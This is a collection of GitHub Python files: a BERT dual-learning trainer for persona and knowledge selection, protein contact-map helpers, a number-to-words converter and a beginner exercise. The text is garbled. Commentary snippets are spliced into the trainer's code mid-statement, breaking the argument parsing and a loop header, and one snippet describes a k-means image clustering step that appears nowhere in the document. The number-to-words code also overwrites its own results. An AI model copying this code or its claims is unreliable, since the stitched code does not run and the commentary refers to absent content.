json\nfrom dataset.persona_dataset import PersonaDataset\nfrom batcher.persona_batcher import PersonaBatcher\n\nlogging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',\n datefmt='%m/%d/%Y %H:%M:%S',\n level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\nparser = argparse.ArgumentParser(description='Pre-training for Knowledge-Grounded Conversation')\n# 
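The k-means pixel clustering above, reduced to its essentials on synthetic data; this assumes `opencv-python` is installed and uses random float32 "pixels" in place of a real image:

```python
# cv2.kmeans on synthetic pixel vectors, mirroring the segmentation step above.
import numpy as np
import cv2

pixels = np.random.rand(200, 3).astype(np.float32)   # stand-in for reshaped RGB
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 100, 0.85)
_, labels, centers = cv2.kmeans(pixels, 3, None, criteria, 10,
                                cv2.KMEANS_RANDOM_CENTERS)
print(centers.shape, np.unique(labels))  # (3, 3) [0 1 2]
```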
model\nparser.add_argument(\"--debug\",default=True,type=str2bool,help='debug mode, using small dataset')\nparser.add_argument('--predict',type=str2bool,default=True)\n\n# files\nparser.add_argument(\"--convo_path\",type=str,default='/home/futc/persona/convo')\nparser.add_argument(\"--persona_path\",type=str,default='/home/futc/persona/history')\nparser.add_argument(\"--knowledge_path\",type=str,default='/home/futc/persona/knowledge')\nparser.add_argument(\"--pseudo_path\",type=str,default='/home/futc/2021work2/pseudo')\n\n# model \nparser.add_argument(\"--vocab\",type=str,default='/home/futc/bert-base-uncased')\nparser.add_argument(\"--dualkp_model\",type=str,default='/home/futc/bert-base-uncased')# (P|CRK) dual learning model\nparser.add_argument(\"--dualpk_model\",type=str,default='/home/futc/bert-base-uncased')# (K|CRP) dual learning model\n\n# parser.add_argument(\"--count_path\",type=str,default='/home/futc/2021work2/knowledge_count.json')\n# parser.add_argument(\"--label_path\",type=str,default='/home/futc/2021work2/label.json')\n# training scheme\nparser.add_argument('--batch_size', type=int, default=1)\nparser.add_argument('--eval_batch_size', type=int, default=4)\nparser.add_argument('--num_steps', type=int, default=1000000)\nparser.add_argument('--accum_step', type=int, default=8)\nparser.add_argument('--lr', type=float, default=1e-5)\nparser.add_argument('--clip', type=float, default=2.0)\nparser.add_argument('--schedule', type=str, default='linear')\n\nparser.add_argument('--weight_decay', type=float, default=0.01)\nparser.add_argument('--adam_epsilon', type=float, default=1e-8)\nparser.add_argument('--warmup_steps', type=int, default=500)\nparser.add_argument('--num_epochs', type=int, default=3)\n\n# log\nparser.add_argument('--print_every', type=int, default=100)\nparser.add_argument('--valid_every', type=int, default=10000)\n\n# save\nparser.add_argument(\"--dump_path\",type=str,default='/home/futc/2021work2/dump')\nparser.add_argument('--exp_name', type=str, default='debug')\nparser.add_argument('--log', type=str, default='log')\nparser.add_argument('--seed', type=int, default=42)\n\nparser.add_argument(\"--max_context_length\",type=int,default=64)\nparser.add_argument(\"--max_persona_length\",type=int,default=64)\nparser.add_argument(\"--max_response_length\",type=int,default=64)\nparser.add_argument(\"--max_knowledge_length\",type=int,default=64)\nparser.add_argument(\"--n_knowledge\",default=32,type=int)\nparser.add_argument(\"--n_persona\",default=32,type=int)\n\n# gpu\nparser.add_argument('--gpu_list', type=str, default='4')\nparser.add_argument('--gpu_ratio', type=float, default=0.85)\nparser.add_argument('--n_device', type=int, default=8)\nparser.add_argument('--no_cuda', type=str2bool, default=False)\n\nparser.add_argument(\"--n_layer\",default=6,type=int)\nparser.add_argument(\"--reward\",default='v3',type=str)\n# v1: the target logit - the average logit\n# v2: the target probability - 0.5\n# v3: the target probability\n\nargs = parser.parse_args()\nif args.debug:\n args.print_every=2\n args.valid_every=8\ntorch.cuda.empty_cache()\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nrandom.seed(args.seed)\nnp.random.seed(args.seed)\ntorch.manual_seed(args.seed)\nout_dir = os.path.join(args.dump_path, args.exp_name)\nif not os.path.exists(out_dir):\n os.makedirs(out_dir)\nargs.out_dir=out_dir\nlogger.addHandler(logging.FileHandler(os.path.join(args.out_dir, \"log\"), 'w'))\nlogger.info(\"\\nParameters:\")\nfor attr, value in 
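The `--reward` options are only described in comments (v1-v3). One way to read them as code, over a `(batch, n_candidates)` logit tensor and a `(batch,)` gold index — this is my interpretation of those comments, not code from the repository:

```python
# The three reward schemes from the comments above, written out explicitly.
import torch

def reward(logits: torch.Tensor, target: torch.Tensor, scheme: str):
    probs = torch.softmax(logits, dim=1)
    tgt_logit = logits.gather(1, target.unsqueeze(1)).squeeze(1)
    tgt_prob = probs.gather(1, target.unsqueeze(1)).squeeze(1)
    if scheme == 'v1':
        return tgt_logit - logits.mean(dim=1)   # target logit minus average logit
    if scheme == 'v2':
        return tgt_prob - 0.5                   # target probability minus 0.5
    return tgt_prob                             # 'v3', the default in args.reward

print(reward(torch.tensor([[2.0, 0.5, -1.0]]), torch.tensor([0]), 'v3'))
```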
sorted(vars(args).items()):\n logger.info(\"{}={}\".format(attr.upper(), value))\n\n\n\ndef recall_metric(scores):\n r1,r2,r5,r10=0.,0.,0.,0.\n #count_path=r'/home/futc/cmudog/'+'train'+'_knowledge_count.json'\n #label_path=r'/home/futc/cmudog/'+'train'+'_label_index.json'\n with open(args.count_path,mode='r',encoding='utf-8')as f:\n knowledge_count=json.load(f)\n with open(args.label_path,mode='r',encoding='utf-8')as f:\n label=json.load(f)\n \n assert len(scores)==np.array(knowledge_count).sum()\n assert len(knowledge_count)==len(label)\n\n for i in range(len(knowledge_count)):\n score=scores[:knowledge_count[i]]\n scores=scores[knowledge_count[i]:]\n order=np.argsort(score)[::-1]\n gold=label[i]\n #gold=0 if correct_first else label[i]\n if gold in order[:1]:\n r1+=1\n if gold in order[:2]:\n r2+=1\n if gold in order[:5]:\n r5+=1\n if gold in order[:10]:\n r10+=1\n\n return r1/len(knowledge_count),r2/len(knowledge_count),r5/len(knowledge_count),r10/len(knowledge_count)\n\n\n\n\n# Output directory for models and summaries\n\n#print('Writing to {}\\n'.format(out_dir))\n#save_hparams(args, os.path.join(out_dir, 'hparams'))\n\n\n# Checkpoint directory\n# checkpoint_dir = os.path.join(out_dir, 'checkpoints')\n# checkpoint_prefix = os.path.join(checkpoint_dir, 'model')\n# if not os.path.exists(checkpoint_dir):\n# os.makedirs(checkpoint_dir)\n# sys.stdout.flush()\n\n# Build dataset\ntime_str = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\nlogger.info(\"Create training dataset begin... | %s \" % time_str)\n\ntrain_dataset=PersonaDataset(args.convo_path,args.persona_path,args.knowledge_path,args.pseudo_path,mode='train')\neval_dataset=PersonaDataset(args.convo_path,args.persona_path,args.knowledge_path,args.pseudo_path,mode='eval')\ntrain_loader=DataLoader(train_dataset,batch_size=args.batch_size,shuffle=True,collate_fn=PersonaDataset.collate_fn)\neval_loader=DataLoader(eval_dataset,batch_size=args.eval_batch_size,shuffle=False,collate_fn=PersonaDataset.collate_fn)\ntrain_loader=itertools.cycle(train_loader)\nlogger.info(\"train examples {}\".format(len(train_dataset)))\nlogger.info(\"eval examples {}\".format(len(eval_dataset)))\n\ntime_str = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\nlogger.info(\"Create training dataset end... 
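`recall_metric` ranks candidates with a descending `argsort` and checks membership of the gold index in the top-k prefix; the core of that check on made-up scores:

```python
# recall@k core: rank candidates best-first, then test the gold index.
import numpy as np

score = np.array([0.1, 0.3, 0.25, 0.05, 0.2])
order = np.argsort(score)[::-1]              # candidate indices, best first
gold = 2
print(order[:2])                             # [1 2]
print(gold in order[:1], gold in order[:2])  # False True
```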
| %s \" % time_str)\ntokenizer=BertTokenizer.from_pretrained(args.vocab)\ntokenizer.add_special_tokens({'pad_token':'[PAD]','sep_token':'[SEP]'})\nbatcher = PersonaBatcher(device,tokenizer,args.n_knowledge,args.n_persona,args.max_context_length,args.max_response_length,args.max_knowledge_length,args.max_persona_length)\n\n\nconfiguration=BertConfig(num_hidden_layers=args.n_layer)\ndualkp_model=BertForSequenceClassification.from_pretrained(args.dualkp_model,config=configuration)\ndualkp_model.resize_token_embeddings(len(tokenizer))\n\ndualpk_model=BertForSequenceClassification.from_pretrained(args.dualpk_model,config=configuration)\ndualpk_model.resize_token_embeddings(len(tokenizer))\n# semip_model=BertModel(configuration)\n# if args.semip_model:\n# reloaded=torch.load(args.semip_model)['state_dict']\n# semip_model.load_state_dict(reloaded,strict='True')\n\n\n#priorp_model.to(device)\n#priork_model.to(device)\ndualkp_model.to(device)\ndualpk_model.to(device)\n\n\nno_decay = [\"bias\", \"LayerNorm.weight\"]\ndualkp_parameters = [\n {\n \"params\": [p for n, p in dualkp_model.named_parameters() if not any(nd in n for nd in no_decay)],\n \"weight_decay\": args.weight_decay,\n },\n {\n \"params\": [p for n, p in dualkp_model.named_parameters() if any(nd in n for nd in no_decay)],\n \"weight_decay\": 0.0,\n },\n]\ndualpk_parameters = [\n {\n \"params\": [p for n, p in dualpk_model.named_parameters() if not any(nd in n for nd in no_decay)],\n \"weight_decay\": args.weight_decay,\n },\n {\n \"params\": [p for n, p in dualpk_model.named_parameters() if any(nd in n for nd in no_decay)],\n \"weight_decay\": 0.0,\n },\n]\n\ndualkp_optimizer = AdamW(dualkp_parameters, lr=args.lr, eps=args.adam_epsilon)\ndualpk_optimizer = AdamW(dualpk_parameters, lr=args.lr, eps=args.adam_epsilon)\ntotal_steps = args.num_epochs * (len(train_dataset) / (args.batch_size * args.accum_step))\n# scheduler = get_linear_schedule_with_warmup(optimizer, num_warmup_steps=args.warmup_steps, num_training_steps=total_steps)\nif args.schedule == 'linear':\n dualkp_scheduler = get_linear_schedule_with_warmup(dualkp_optimizer, num_warmup_steps=args.warmup_steps, num_training_steps=total_steps)\n dualpk_scheduler = get_linear_schedule_with_warmup(dualpk_optimizer, num_warmup_steps=args.warmup_steps, num_training_steps=total_steps)\nelif args.schedule == 'cosine':\n dualkp_scheduler = get_cosine_schedule_with_warmup(dualkp_optimizer, num_warmup_steps=args.warmup_steps, num_training_steps=total_steps)\n dualpk_scheduler= get_cosine_schedule_with_warmup(dualpk_optimizer, num_warmup_steps=args.warmup_steps, num_training_steps=total_steps)\n\n\ndef train_step(global_step):\n dualloss_total = 0.0\n for _ in range(args.accum_step):\n context_list,response_list,persona_list,knowledge_list, plabel_list,klabel_list= next(train_loader)\n #The dual learning part\n dualpk_model.train()\n dualkp_model.eval()\n batcher.load(context_list,response_list,persona_list,knowledge_list,plabel_list,klabel_list)\n batch_dict=batcher('k|crp',None,plabel_list)\n input_id=batch_dict['input_id']\n segment_id=batch_dict['segment_id']\n assert input_id.dim()==3 and input_id.shape==segment_id.shape\n bs,n_know,seq_len=input_id.shape\n #(bs*n_know,2)\n dual_klogits=dualpk_model(input_ids=input_id.view(-1,seq_len),attention_mask=input_id.view(-1,seq_len)!=tokenizer.pad_token_id,token_type_ids=segment_id.view(-1,seq_len),return_dict=True)['logits']\n #(bs,n_know)\n dual_klogits=dual_klogits.view(bs,n_know,-1)[:,:,1]\n #(bs)\n 
kind=torch.multinomial(torch.softmax(dual_klogits,dim=1),num_samples=1,replacement=True).squeeze(1)\n #kind=torch.max(dual_klogits,dim=1)[1].detach().cpu().tolist()\n selected_know=[knowledge_list[i][min(kind[i].item(),len(knowledge_list[i])-1)] for i in range(bs)]\n \n with torch.no_grad():\n batch_dict=batcher('p|crk',selected_know,None)\n input_id=batch_dict['input_id']\n segment_id=batch_dict['segment_id']\n assert input_id.dim()==3 and input_id.shape==segment_id.shape\n bs,n_per,seq_len=input_id.shape\n # (bs*n_per,2)\n post_plogits=dualkp_model(input_ids=input_id.view(-1,seq_len),attention_mask=input_id.view(-1,seq_len)!=tokenizer.pad_token_id,token_type_ids=segment_id.view(-1,seq_len),return_dict=True)['logits']\n # (bs,n_per)\n post_plogits=post_plogits.view(bs,n_per,-1)[:,:,1]\n #(bs)\n target=torch.tensor([persona_list[i].index(plabel_list[i]) for i in range(bs)],dtype=torch.long,device=device)\n #(bs)\n post_pprob=torch.softmax(post_plogits,dim=1)\n # TODO: the reward need to be designed\n reward=torch.gather(post_pprob,dim=1,index=target.unsqueeze(1)).squeeze(1)\n \n # the tensor to backward the gradient \n tensor1=torch.gather(torch.log_softmax(dual_klogits,dim=1),dim=1,index=kind.unsqueeze(1)).squeeze(1)\n dual_loss1=-torch.sum(tensor1*reward,dim=0)\n dualloss_total+=dual_loss1.item()\n dual_loss1=dual_loss1/args.accum_step\n dual_loss1.backward()\n\n dualkp_model.train()\n dualpk_model.eval()\n batch_dict=batcher('p|crk',klabel_list,None)\n input_id=batch_dict['input_id']\n segment_id=batch_dict['segment_id']\n assert input_id.dim()==3 and input_id.shape==segment_id.shape\n bs,n_per,seq_len=input_id.shape\n # (bs*n_per,2)\n dual_plogits=dualkp_model(input_ids=input_id.view(-1,seq_len),attention_mask=input_id.view(-1,seq_len)!=tokenizer.pad_token_id,token_type_ids=segment_id.view(-1,seq_len),return_dict=True)['logits']\n # (bs,n_per)\n dual_plogits=dual_plogits.view(bs,n_per,-1)[:,:,1]\n pind=torch.multinomial(torch.softmax(dual_plogits,dim=1),num_samples=1,replacement=True).squeeze(1)\n #pind=torch.max(dual_plogits,dim=1)[1].detach().cpu().tolist()\n selected_per=[persona_list[i][min(pind[i].item(), len(persona_list[i])-1)] for i in range(bs)]\n with torch.no_grad():\n batch_dict=batcher('k|crp',None,selected_per)\n input_id=batch_dict['input_id']\n segment_id=batch_dict['segment_id']\n assert input_id.dim()==3 and input_id.shape==segment_id.shape\n bs,n_know,seq_len=input_id.shape\n #(bs*n_know,2)\n post_klogits=dualpk_model(input_ids=input_id.view(-1,seq_len),attention_mask=input_id.view(-1,seq_len)!=tokenizer.pad_token_id,token_type_ids=segment_id.view(-1,seq_len),return_dict=True)['logits']\n #(bs,n_know)\n post_klogits=post_klogits.view(bs,n_know,-1)[:,:,1]\n #(bs)\n target=torch.tensor([knowledge_list[i].index(klabel_list[i]) for i in range(bs)],dtype=torch.long,device=device)\n #(bs)\n post_kprob=torch.softmax(post_klogits,dim=1)\n #reward=torch.gather(post_kprob,dim=1,index=target.unsqueeze(1)).squeeze(1)-torch.tensor([0.5]*bs,dtype=torch.float,device=device)\n reward=torch.gather(post_kprob,dim=1,index=target.unsqueeze(1)).squeeze(1)\n #reward=torch.gather(post_klogits,dim=1,index=target.unsqueeze(1)).squeeze(1)-torch.mean(post_klogits,dim=1)\n tensor2=torch.gather(torch.log_softmax(dual_plogits,dim=1),dim=1,index=pind.unsqueeze(1)).squeeze(1)\n dual_loss2=-torch.sum(tensor2*reward,dim=0)\n dualloss_total+=dual_loss2.item()\n dual_loss2=dual_loss2/args.accum_step\n dual_loss2.backward()\n # if args.dual_loss=='ce':\n # loss=F.cross_entropy(plogits,target)\n # elif 
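`train_step` above uses a score-function (REINFORCE-style) estimator: sample a candidate, weight its log-probability by a reward computed under `no_grad`, and backpropagate only through the sampling distribution. The same pattern reduced to one toy step, with a random scalar standing in for the dual model's probability:

```python
# One toy REINFORCE-style step over (batch=2, n_candidates=4) logits.
import torch

logits = torch.randn(2, 4, requires_grad=True)
probs = torch.softmax(logits, dim=1)
idx = torch.multinomial(probs, num_samples=1).squeeze(1)   # sampled candidates
with torch.no_grad():
    reward = torch.rand(2)            # stand-in for the posterior probability
log_prob = torch.log_softmax(logits, dim=1).gather(
    1, idx.unsqueeze(1)).squeeze(1)
loss = -(log_prob * reward).sum()     # gradient flows only through log_prob
loss.backward()
print(logits.grad.shape)              # torch.Size([2, 4])
```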
args.dual_loss=='mm':\n # loss=F.multi_margin_loss(logits,target)\n # label=batch_dict['label']\n # loss=model(input_ids=input_id,attention_mask=attention_mask,token_type_ids=segment_id,labels=label,return_dict=True)['loss']\n # loss.backward()\n # ks_loss_total += loss.item()\n\n grad_norm1 = torch.nn.utils.clip_grad_norm_([p for p in dualkp_model.parameters() if p.requires_grad], args.clip)\n grad_norm2 = torch.nn.utils.clip_grad_norm_([p for p in dualpk_model.parameters() if p.requires_grad], args.clip)\n if grad_norm1 >= 1e2 or grad_norm2 >1e2:\n logger.info('WARNING : Exploding Gradients {:.2f} {:.2f}'.format(grad_norm1,grad_norm2))\n dualkp_optimizer.step()\n dualkp_scheduler.step()\n dualkp_optimizer.zero_grad()\n\n dualpk_optimizer.step()\n dualpk_scheduler.step()\n dualpk_optimizer.zero_grad()\n\n if global_step % args.print_every == 0 and global_step != 0:\n time_str = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n logger.info(\"Step: %d \\t| ks_loss: %.3f \\t| lr: %.8f \\t| %s\" % (\n global_step, dualloss_total, dualkp_scheduler.get_lr()[0], time_str\n ))\n # sys.stdout.flush()\n\ndef predict_step(global_step):\n #if split == 'test_seen':\n # test_loader = test_seen_loader\n #else:\n # raise ValueError\n dualkp_model.eval()\n dualpk_model.eval()\n hit1 = 0\n hit2 = 0\n hit5 = 0 \n hit10= 0\n count=0\n with torch.no_grad():\n for context_list,response_list,persona_list,knowledge_list, plabel_list,klabel_list in eval_loader:\n batcher.load(context_list,response_list,persona_list,knowledge_list,plabel_list,klabel_list)\n batch_dict=batcher('k|crp',None,plabel_list)\n input_id=batch_dict['input_id']\n segment_id=batch_dict['segment_id']\n assert input_id.dim()==3 and input_id.shape==segment_id.shape\n bs,n_know,seq_len=input_id.shape\n logits = dualpk_model(input_ids=input_id.view(-1,seq_len),attention_mask=(input_id.view(-1,seq_len)!=tokenizer.pad_token_id),token_type_ids=segment_id.view(-1,seq_len),return_dict=True)['logits']\n logits = logits.view(bs,n_know,-1)[:,:,1]\n count += len(context_list)\n if count % 1000 == 0:\n logger.info(\"eval finishing {}\".format(count))\n bs=len(context_list)\n ref=torch.tensor([knowledge_list[i].index(klabel_list[i]) for i in range(bs)],dtype=torch.long,device=device)\n # hyp=torch.max(logits,dim=1)[1]\n # hit1+=torch.sum(hyp==ref,dim=0).item()\n hyp=torch.topk(logits,k=10)[1]\n hit1+=(hyp[:,:1]==ref[:,None]).sum(1).sum(0).item()\n hit2+=(hyp[:,:2]==ref[:,None]).sum(1).sum(0).item()\n hit5+=(hyp[:,:5]==ref[:,None]).sum(1).sum(0).item()\n hit10+=(hyp[:,:10]==ref[:,None]).sum(1).sum(0).item()\n \n logger.info(\"knowledge prediction hit1 is {:.4f}\".format(hit1/count))\n logger.info(\"knowledge prediction hit2 is {:.4f}\".format(hit2/count))\n logger.info(\"knowledge prediction hit5 is {:.4f}\".format(hit5/count))\n logger.info(\"knowledge prediction hit10 is {:.4f}\".format(hit10/count))\n\n hit1 = 0\n hit2 = 0\n hit5=0\n hit10=0\n count=0\n with torch.no_grad():\n for context_list,response_list,persona_list,knowledge_list, plabel_list,klabel_list in eval_loader:\n batcher.load(context_list,response_list,persona_list,knowledge_list,plabel_list,klabel_list)\n batch_dict=batcher('p|crk',klabel_list,None)\n input_id=batch_dict['input_id']\n segment_id=batch_dict['segment_id']\n assert input_id.dim()==3 and input_id.shape==segment_id.shape\n bs,n_per,seq_len=input_id.shape\n logits = 
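`predict_step` counts hit@k by comparing `torch.topk` indices against the gold index with broadcasting; in isolation on toy logits (k must not exceed the number of candidates):

```python
# hit@k counting via topk + broadcast comparison, as in predict_step above.
import torch

logits = torch.tensor([[0.1, 0.9, 0.3], [0.8, 0.2, 0.5]])
ref = torch.tensor([1, 2])              # gold candidate index per example
hyp = torch.topk(logits, k=2).indices   # (batch, k), ranked best-first
hits_at_1 = (hyp[:, :1] == ref[:, None]).sum().item()
hits_at_2 = (hyp[:, :2] == ref[:, None]).sum().item()
print(hits_at_1, hits_at_2)             # 1 2
```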
dualkp_model(input_ids=input_id.view(-1,seq_len),attention_mask=(input_id.view(-1,seq_len)!=tokenizer.pad_token_id),token_type_ids=segment_id.view(-1,seq_len),return_dict=True)['logits']\n logits = logits.view(bs,n_per,-1)[:,:,1]\n count += len(context_list)\n if count % 1000 == 0:\n logger.info(\"eval finishing {}\".format(count))\n bs=len(context_list)\n ref=torch.tensor([persona_list[i].index(plabel_list[i]) for i in range(bs)],dtype=torch.long,device=device)\n # hyp=torch.max(logits,dim=1)[1]\n # hit1+=torch.sum(hyp==ref,dim=0).item()\n hyp=torch.topk(logits,k=10)[1]\n hit1+=(hyp[:,:1]==ref[:,None]).sum(1).sum(0).item()\n hit2+=(hyp[:,:2]==ref[:,None]).sum(1).sum(0).item()\n hit5+=(hyp[:,:5]==ref[:,None]).sum(1).sum(0).item()\n hit10+=(hyp[:,:10]==ref[:,None]).sum(1).sum(0).item()\n \n logger.info(\"persona prediction hit1 is {:.4f}\".format(hit1/count))\n logger.info(\"persona prediction hit2 is {:.4f}\".format(hit2/count))\n logger.info(\"persona prediction hit5 is {:.4f}\".format(hit5/count))\n logger.info(\"persona prediction hit10 is {:.4f}\".format(hit10/count))\n\n if args.predict:\n exit()\n # with open(os.path.join(args.out_dir, 'score-iter-{}.txt'.format( global_step)), 'w', encoding='utf-8') as f:\n # for label, score in zip(labels, scores):\n # f.write('{}\\t{}\\n'.format(label, score))\n\n # time_str = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n # logger.info(\"**********************************\")\n # logger.info(\"test results..........\")\n # logger.info(\"Step: %d \\t| %s\" % (global_step, time_str))\n\n #model_to_save = model.module if hasattr(model, \"module\") else model\n #checkpoint_dir=os.path.join(args.out_dir,'{}step_model'.format(global_step))\n dualpk_model.save_pretrained(os.path.join(args.out_dir,'{}step_dualpk_model'.format(global_step)))\n dualkp_model.save_pretrained(os.path.join(args.out_dir,'{}step_dualkp_model'.format(global_step)))\n #torch.save(dualpk_model,os.path.join(args.out_dir,'{}step_dualpk_model'.format(global_step)))\n #checkpoint_dir=os.path.join(args.out_dir,'{}step_model'.format(global_step))\n #torch.save(dualkp_model,os.path.join(args.out_dir,'{}step_dualkp_model'.format(global_step)))\n logger.info(\"Saved model checkpoint \\n\")\n # f1=recall_metric(scores,test_knowledges,test_responses)\n # return f1\n # r1, r2, r5, r10 = recall_metric(scores)\n # logger.info(\"RECALL-1/2/5/10: {:.4f}/{:.4f}/{:.4f}/{:.4f}\".format(r1, r2, r5, r10))\n # logger.info(\"**********************************\")\n #sys.stdout.flush()\n\n # return {'r_at_1': r1, 'r_at_2': r2, 'r_at_5': r5, 'r_at_10': r10}\n\nbest_f1 = -1.\nif args.predict:\n predict_step(0)\n #logger.info(\"predict result: the f1 between predict knowledge and response: {:.6f}\".format(f1))\n exit()\nfor i in range(args.num_steps):\n train_step(i + 1)\n if (i + 1) % args.valid_every == 0:\n predict_step(i+1)","repo_name":"TingchenFu/PersonaKGC","sub_path":"dual.py","file_name":"dual.py","file_ext":"py","file_size_in_byte":21737,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"21"} +{"seq_id":"72081970613","text":"import Bio.PDB\nimport numpy\nimport os.path\nimport tempfile\nimport urllib\nimport http.client as httplib\nimport signal\n\ndef calc_residue_dist(residue_one, residue_two) :\n \"\"\"\n Returns the C-alpha distance between two residues.\n \"\"\"\n diff_vector = residue_one[\"CA\"].coord - residue_two[\"CA\"].coord\n return numpy.sqrt(numpy.vdot(diff_vector, diff_vector))\n\ndef count_residues(model):\n \"\"\"\n Returns the number of 
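`calc_residue_dist` above is a plain Euclidean norm over Cα coordinates; the same computation on bare vectors, without Bio.PDB objects:

```python
# C-alpha distance as a Euclidean norm, on illustrative coordinates.
import numpy as np

ca_one = np.array([0.0, 0.0, 0.0])
ca_two = np.array([3.0, 4.0, 0.0])
diff = ca_one - ca_two
print(np.sqrt(np.vdot(diff, diff)))  # 5.0, same as np.linalg.norm(diff)
```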
residues contained by the given model by determining\n the length of the generator returned by Model.get_residues().\n \"\"\"\n return sum(1 for e in model.get_residues())\n\ndef fetch_pdb(pdbid, filename):\n \"\"\"\n Attemps to fetch from rcsb.org a pdb file representing the protein with the\n given ID. If successful, saves the pdb to a temp file and returns the\n filename.\n \"\"\"\n pdb_url = \"https://www.rcsb.org/pdb/files/%s.pdb\" % pdbid.lower()\n urllib.urlretrieve(pdb_url, filename=filename)\n\ndef get_structure(pdbfile):\n \"\"\"\n For convenience - returns a Bio.PDB.Structure object constructed from the\n given pdb file.\n \"\"\"\n root, ext = os.path.splitext(pdbfile)\n if ext.lower() != \".pdb\":\n raise ValueError(\"Given file is not a .pdb file.\")\n return Bio.PDB.PDBParser().get_structure(root, pdbfile)\n\ndef remove_hetero(model):\n \"\"\"\n Removes all heterogeneous residues from a model. Use this if your\n calculations should only be considered with the actual protein residues.\n \"\"\"\n for chain in model:\n hetero_list = []\n for residue in chain:\n id = residue.get_id()\n if id[0] != \" \":\n hetero_list.append(id)\n for id in hetero_list:\n chain.detach_child(id)\n\ndef residue_array(model):\n \"\"\"\n Creates a numpy array containing all residues in the given model.\n Arrays can be convenient as opposed to the generator returned by \n Model.get_residues()\n \"\"\"\n a = numpy.zeros(count_residues(model), numpy.object)\n for i, res in enumerate(model.get_residues()): a[i] = res\n return a\n\ndef check_url(url):\n \"\"\"\n Check if the given url is accessible. Returns nothing if accessible,\n raise exception if not. Use signals to implement timeout because\n timeout argument of HTTPConnection does not exist in Python 2.5.2\n \"\"\"\n def handler(signum, frame):\n raise Exception(\"%s: Timeout\" % url)\n signal.signal(signal.SIGALRM, handler)\n signal.alarm(10)\n conn = httplib.HTTPConnection(url)\n conn.request(\"HEAD\", \"/\")\n res = conn.getresponse()\n signal.alarm(0)\n if res.status != 200:\n raise Exception(\"%s: Status %d returned.\" % (url, res.status))\n\n","repo_name":"GeorgeIniatis/AlphaFold_Dataset_Drug_Binding_Prediction","sub_path":"contactmaps/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31386463186","text":"# Author : Parishkar Singh Python 3.10 2022\n# ...............................................................\n# Converting Number to words\n# ...............................................................\nimport inflect\n\n\ndef convertOnes():\n # given input 0 1 2 3 4 5 6 7 8 9\n string = ','+inflect.engine().number_to_words(123456789, group=1)\n return string.split(',')\n\n\ndef convertTwos():\n # given input 10 11 12 13 14 15 16 17 18 19\n string = inflect.engine().number_to_words(10111213141516171819, group=2)\n # output ten, eleven, tweleve, thirteen, fourteen, fifteen, sixteen, seventeen, eighteen, nineteen\n return string.split(',')\n\n\ndef convertTens():\n # given input 20 30 40 50 60 70 80 90\n string = ','+' ,'+inflect.engine().number_to_words(2030405060708090, group=2)\n # output twenty, thirty, forty, fifty, sixty, seventy, eighty, ninety\n return string.split(',')\n\n\ndef convertHundreds():\n string = \"\"\n for i in range(1, 10):\n string = string+inflect.engine().number_to_words(i, group=1)+\" hundred,\"\n string = string[:len(string)-1:]\n # output one to nine hundred\n return 
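Two portability notes on the contactmaps helpers above: in Python 3 the download call lives at urllib.request.urlretrieve (bare urllib.urlretrieve no longer exists), and numpy.object was removed in NumPy 1.24 (plain object works). Separately, calc_residue_dist computes one pair at a time; for whole-structure work the distance matrix vectorises cleanly. A sketch on raw coordinates, independent of Bio.PDB, with an 8 Å cutoff as a common contact-map convention (not something the module fixes):

# Vectorised pairwise-distance / contact-map sketch on an (N, 3) coordinate
# array, equivalent to calling calc_residue_dist for every residue pair.
import numpy as np

coords = np.random.rand(50, 3) * 30.0           # stand-in for CA coordinates
diff = coords[:, None, :] - coords[None, :, :]  # (N, N, 3) displacements
dist = np.sqrt((diff ** 2).sum(axis=-1))        # (N, N) distance matrix
contact_map = dist < 8.0
print(contact_map.shape, contact_map.sum())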
string.split('-')\n\n\ndef sigificantPlaceValue():\n return{3: 'thousand', 6: 'million', 9: 'billion'}\n\n\ndef printlist(a):\n for i in range(0, len(a)):\n print(a[i], end=\" \")\n\n\n# global list of words .............................................................................\nones = convertOnes() # contains a list of zero-nine\ntwos = convertTwos() # contains a list of ten-twenty words\ntens = convertTens() # contains a list of twenty-hundred\nX = ones+twos\nY = tens\nhundreds = convertHundreds()\n# suffix contains list of bigger values like thousand, million and billion\nsuffixs = sigificantPlaceValue()\n# combined dictionary contains reference to all the words\ncombined = {0: ones, 1: twos, 2: tens, 3: suffixs, }\n# ..................................................................................................\n\n\ndef convertToDigit(n, suffix):\n if n == 0:\n return EMPTY\n\n # split `n` if it is more than 19\n if n > 19:\n return Y[n // 10] + X[n % 10] + suffix\n else:\n return X[n] + suffix\n\n\ndef convertToWords(n):\n # add digits at ten million and hundred million place\n result = convertToDigit((n // 1000000000) % 100, 'Billion, ')\n # add digits at the million mark\n result = convertToDigit((n // 1000000) % 100, ' million, ')\n # add digits at thousand and tens thousand place\n result += convertToDigit(((n // 1000) % 100), ' thousand, ')\n # add digit at hundred place\n result += convertToDigit(((n // 100) % 10), ' hundred ')\n\n if n > 100 and n % 100:\n result += 'and '\n\n # add digits at ones and tens place\n result += convertToDigit((n % 100), '')\n\n return result.strip().rstrip(',').replace(', and', ' and')\n\n\nif __name__ == '__main__':\n EMPTY = ''\n # print(convertToWords(10))\n # print(combined[1][4])\n # print(ones)\n # print(twos)\n # print(tens)\n # print(hundreds)\n print(convertToWords(32))\n # print(combined[0][4])\n # printlist(suffixs)\n # a = convertOnes()\n # printlist(two)\n","repo_name":"parishkar-9790/Python","sub_path":"src/py47advancenumbertoword.py","file_name":"py47advancenumbertoword.py","file_ext":"py","file_size_in_byte":3146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7378557414","text":"#if statements problem-----------------------------------------------\nbench = int(input(\"How much can you bench?: \"))\n\nif bench <10:\n print(\"Keep practicing and you'll eventually get better\")\nelif bench > 10 and bench < 50:\n print(\"You're getting good at this\")\nelif bench > 50:\n print(\"You're swol\")\n\n\n#for loop problem-----------------------------------------------\nfor i in range(20, 52, 2):\n print(i, end = \" \")\n\n#while loop 